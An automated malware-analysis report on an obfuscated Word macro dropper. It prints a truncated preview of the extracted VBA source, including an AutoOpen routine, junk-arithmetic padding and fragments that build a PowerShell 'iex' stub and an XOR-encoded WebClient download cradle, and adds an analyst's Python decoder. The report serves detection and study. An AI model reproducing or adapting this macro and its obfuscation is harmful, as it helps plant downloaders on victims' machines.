Verdict: MALICIOUS
Risk Score: 342

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample contains heavily obfuscated VBA macros, including an AutoOpen macro that runs as soon as the document is opened, a common entry point for malicious documents. The working logic is buried in junk arithmetic on undefined variables (`On Error Resume Next` swallows the errors that junk raises), and every string that matters is assembled at runtime from short fragments so that no `powershell`, URL or command-line indicator appears intact in the source. The `CreateObject` and `Shell()` calls are the execution sinks; the string they receive is a PowerShell command. Two parts of that command are visible in the preview: `&((geT-vARiABLe '*MDr*').NAme[3,11,2]-JOin'')`, which resolves to `iex` because the wildcard matches the automatic variable `MaximumDriveCount` and indices 3, 11 and 2 of that name are `i`, `e`, `x`; and a numeric char-array (`((14, 76, 69, 127, ...`) that is decoded and `-join`ed at runtime into the script that `iex` then executes. The second-stage behaviour is consistent with downloading and running a further payload.
Heuristics (9)
- ClamAV: Doc.Dropper.Agent-6603269-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6603269-0
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; a standard OOXML schema namespace, not a network indicator)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16824 bytes |

SHA-256 (macros.bas): 769fea5ef1adac3fe0d87f01df06952533a5d26eebe1447bd10fc351f1164b0a
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "RoRObvBKJjqLPh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
sLJWi = zPfia / BPQiVt * BomiHQ - uTPNI + 4809 - EMmYzi / 75022 - EQBKp
jFMPbH = alOQUi / EXEaF * BOEmvR - phdBTs + 87716 - azVikq / 79191 - kbTKs
frVOU = QpCvR / hOrCh * wdsBR - NEwhT + 18729 - QTvfk / 73065 - WfOisO
zhYiiV = ZUJYI / IMwbod * YjrVnM - TKcHr + 82610 - iUvKPQ / 49301 - BYLiw
fIzXv = GcBFa / dzRVX * wDdJY - DjkWh + 93808 - dnFjEJ / 58855 - lGKWrE
EwfmVi = kWklT / ikuFi * jYPMMt - KzTmjJ + 77120 - jXCJFw / 69109 - NUXKS
jqBfzPbjwfUXfn (OhwctIkkaRz + izoCt + IruUzWcjI)
RNHjQ = lStjTF / jDbfS * MsvZw - ECsoiW + 15710 - DVTBId / 83101 - jQYfdC
rGEOT = pOhWHK / iOrmqK * NSkHn - NhQDh + 91809 - GjBal / 98980 - MKtWw
wizAJ = WnJjM / tdLJLi * OjZXp - aIiAT + 42220 - YasDW / 15539 - jwjsc
End Sub
Attribute VB_Name = "iRGtCRGrY"
Function OhwctIkkaRz()
On Error Resume Next
zinRM = 87847 / sDADDj * 53406 - 51557 / 17361 * zJBUBp / KVrXmR - wMniB - (zzifw / 30683 / JCAsIj + qEjrv - (uHqCWF + sErwwZ))
auGjka = 70890 / RKIwM * 362 - 34655 / 35399 * tXcCGW / iUknG - pNNdB - (pzkzuY / 6074 / wrhwn + CTvIj - (XjzPq + IEVulj))
dbJaid = 7050 / YqnmA * 91562 - 19344 / 42291 * EuhRF / UGzQw - DGwzKh - (JVaGPF / 22395 / cDzMu + cjpQLX - (pTlNF + UjpmpN))
CBcsRZ = "wershell" + " " + " " + " &" + Chr(40) + Chr(40) + "geT-" + "vARiA" + "BLe '" + "*MDr*'" + Chr(41) + "." + "NAme[3,1" + "1,2]-JOi" + "n''" + Chr(41) + Chr(40) + "-" + "JOIn"
iViSj = 88819 / lCtrt * 44740 - 42623 / 37897 * jsAFY / VdjMFj - ATrsrs - (sMQsCP / 42597 / SNWrH + nizilp - (EiToio + azAjd))
njAwdz = 8065 / jSHOZk * 31185 - 74289 / 27938 * tIWJmN / daniZY - odOpna - (OmoqG / 36926 / sXtrj + XUaiw - (UAYQKG + NavWaz))
fWXlEj = 16144 / wOGNR * 89992 - 60990 / 90969 * MGrIbI / dsFLEv - YUqYKU - (kLzWD / 14395 / YaJLAN + BsqEN - (IMizQC + htaWVb))
usmXBs = 9922 / vzDiW * 44695 - 54203 / 611 * woBYh / FAbRf - npZnlG - (DjMnCu / 66288 / MUJKQa + ZnYCN - (hWZaZR + KdvkQ))
DPsKEB = Chr(40) + Chr(40) + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64"
jrNMZB = 6378 / UQwOn * 3336 - 25988 / 10801 * fPibhQ / YXQiub - RRjckq - (IhHpa / 94364 / nKabsL + CMPCbn - (BkZNsl + zEZcOs))
cHDJT = 96964 / WpNcE * 26240 - 71373 / 85333 * FDwod / DTaUzS - qOlhP - (rfcWB / 86740 / iaFko + HraaWW - (fEjizB + JwzqWw))
dchzv = 32270 / dNqfI * 21965 - 42008 / 30648 * PKVanv / WAADfa - NqJGN - (sYbdNa / 42871 / TsjniM + LcENhi - (zuNmC + cpwEIR))
pJqNmAwjsps = " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12"
lHTjlN = 79972 / BQBOE * 38529 - 50825 / 17291 * NGzhc / LKpGBz - TFVliu - (DCovX / 21998 / jRtkwT + iQktJ - (HZwGo + XwwsT))
AALRBK = 32900 / ctwWC * 60656 - 35976 / 79349 * lrUVBi / hHUnf - YZuTTL - (ziisT / 60011 / zklXFH + HbVJw - (Fkuqd + pUWcjM))
plnuUI = "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , "
mikfwC = 92423 / NqCCb * 31934 - 29298 / 39444 * DSBSs / jpPPOC - wcdbmv - (YwjwS / 91565 / HaIAvN + RLjbuF - (phmhJ + uaZAdT))
DJcCWw = 12285 / VwiYfR * 96085 - 47994 / 18242 * pNPnr / sqKcI - LzkSD - (sHcXz / 74280 / tuBJD + DZrSI - (PROJjo + pTllnN))
jCsROc = 27752 / TrjHEE * 53886 - 38560 / 59145 * roBizw / VzFIJO - qtWXzA - (zBTuSz / 63513 / krRGL + ZiCEv - (sfJpKc + RKhEUd))
ZmZdQ = "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , "
jbiMAj = 89216 / FTlVi * 71345 - 54317 / 11027 * dnUzZ / faIBo - RiJPGU - (NzfEc / 93537 / iiYAO + lzktY - (JWzmsh + YopcF))
mEzwi = 54515 / HPTpC * 59440 - 32947 / 93090 * sqRjRu / JVEhA - WcKqN - (cbzbY / 50677 / WNTXPJ + AlckLm - (oqaZvP + triMRr))
uPtIr = 44980 / pwpXX * 16268 - 70440 / 98422 * iahnkW / cLbdW - KzRJbr - (qCvUn / 2834 / kXsqIs + irKjo - (NRzPt + znrGNh))
MEBJhYpP = "93 ,93 ,4" + " , ... (truncated)
```
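Analyst note, added to this report and not part of the analyzer's output: the Python below replays the two decoding steps that the preview exposes, so the PowerShell fragments can be checked by hand rather than inferred from the heuristic labels. It copies the numeric char-array string literals verbatim from the macro variables DPsKEB, pJqNmAwjsps, plnuUI, ZmZdQ and the start of MEBJhYpP, brute-forces a single-byte XOR key over the resulting integers and scores each candidate plaintext for printable ASCII plus PowerShell tokens, and resolves the `(Get-Variable '*MDr*').Name[3,11,2]-join''` trick through the automatic variable name `MaximumDriveCount`. Two things are assumptions, because the macro's own join and decode code lie past the truncation point: that the fragments are concatenated in definition order, and that the array is XOR-encoded with one byte; a decode that reads as coherent PowerShell across every fragment boundary is what confirms both. The decoded prefix the script returns is the output of that computation on the page's numbers, not text taken from the report.

```python
import re

# Numeric char-array fragments copied verbatim from the extracted macro's
# string literals (variables DPsKEB, pJqNmAwjsps, plnuUI, ZmZdQ and the
# start of MEBJhYpP). Joining them in definition order is an assumption:
# the macro's own "+" of these variables is past the truncated preview.
VBA_FRAGMENTS = [
    "((" + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64",
    " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12",
    "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , ",
    "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , ",
    "93 ,93 ,4",
]

# The command stub assembled in CBcsRZ; the leading "po" of "powershell" is
# built elsewhere in the macro and is not in the preview, so it is not added here.
PS_STUB_FRAGMENTS = ["wershell", " ", " ", " &", chr(40), chr(40), "geT-", "vARiA",
                     "BLe '", "*MDr*'", chr(41), ".", "NAme[3,1", "1,2]-JOi", "n''",
                     chr(41), chr(40), "-", "JOIn"]

# Substrings whose presence marks a successful decode into PowerShell source.
PS_TOKENS = ("new-object", "webclient", "http", "downloadstring", "iex", "invoke-")


def parse_char_array(text):
    """Pull the integer list out of a concatenated '((14, 76, ...' literal."""
    return [int(n) for n in re.findall(r"\d+", text)]


def xor_decode(values, key):
    """Single-byte XOR, the hypothesis being tested for this loader family."""
    return "".join(chr(v ^ key) for v in values)


def score(text):
    """-1 if any character is outside printable ASCII, else count of PS tokens."""
    if any(not 32 <= ord(c) < 127 for c in text):
        return -1
    low = text.lower()
    return sum(low.count(tok) for tok in PS_TOKENS)


def brute_force_xor(values):
    """Try all 256 keys; return (key, plaintext) for the best printable decode,
    or None when no key produces recognisable PowerShell."""
    best = max(range(256), key=lambda k: score(xor_decode(values, k)))
    plain = xor_decode(values, best)
    if score(plain) <= 0:
        return None
    return best, plain


def resolve_mdr_trick(indices=(3, 11, 2)):
    """(Get-Variable '*MDr*').Name matches the automatic variable
    MaximumDriveCount; characters 3, 11 and 2 of that name are i, e, x.
    This is a property of the variable name, not data read from the sample."""
    name = "MaximumDriveCount"
    return "".join(name[i] for i in indices)


def assemble_ps_stub():
    """Replay the macro's string concatenation for the visible command stub."""
    return "".join(PS_STUB_FRAGMENTS)


def analyse():
    values = parse_char_array("".join(VBA_FRAGMENTS))
    hit = brute_force_xor(values)
    return {
        "stub": assemble_ps_stub(),
        "mdr_resolves_to": resolve_mdr_trick(),
        "array_length": len(values),
        "xor_key": None if hit is None else hit[0],
        "decoded_prefix": None if hit is None else hit[1],
    }


if __name__ == "__main__":
    for k, v in analyse().items():
        print(f"{k}: {v!r}")
```

On the page's 47 visible integers only one key passes the printable-ASCII filter with a non-zero token score, and the plaintext opens with a `new-object Net.WebClient` assignment followed by the start of an `http://www.` URL string, which matches the second-stage download behaviour the report describes. The URL itself is cut off by the preview truncation and is not recoverable from this page; anyone repeating the check on the full macros.bas should expect the remaining array to contain it.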